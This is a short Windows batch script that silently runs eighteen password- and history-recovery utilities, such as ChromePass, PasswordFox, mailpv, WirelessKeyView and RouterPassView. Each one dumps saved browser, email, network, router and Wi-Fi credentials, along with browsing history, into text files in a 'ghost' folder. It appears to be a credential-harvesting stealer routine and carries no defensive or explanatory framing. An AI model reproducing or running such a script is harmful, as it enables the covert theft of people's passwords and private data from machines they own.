start BrowserDownloadsView.exe /stext ghost\BrowserDownloadsView.txt
start BrowsingHistoryView.exe /stext ghost\BrowsingHistoryView.txt
start BulletsPassView.exe /stext ghost\BulletsPassView.txt
start ChromeHistoryView.exe /stext ghost\ChromeHistoryView.txt
start ChromePass.exe /stext ghost\ChromePass.txt
start Dialupass.exe /stext ghost\Dialupass.txt
start FBCacheView.exe /stext ghost\FBCacheView.txt
start iepv.exe /stext ghost\iepv.txt
start mailpv.exe /stext ghost\mailpv.txt
start netpass.exe /stext ghost\netpass.txt
start OperaPassView.exe /stext ghost\OperaPassView.txt
start PasswordFox.exe /stext ghost\PasswordFox.txt
start ProcessTCPSummary.exe /stext ghost\ProcessTCPSummary.txt
start PstPassword.exe /stext ghost\PstPassword.txt
start RouterPassView.exe /stext ghost\RouterPassView.txt
start WebBrowserPassView.exe /stext ghost\WebBrowserPassView.txt
start WifiHistoryView.exe /stext ghost\WifiHistoryView.txt
start WirelessKeyView.exe /stext ghost\WirelessKeyView.txt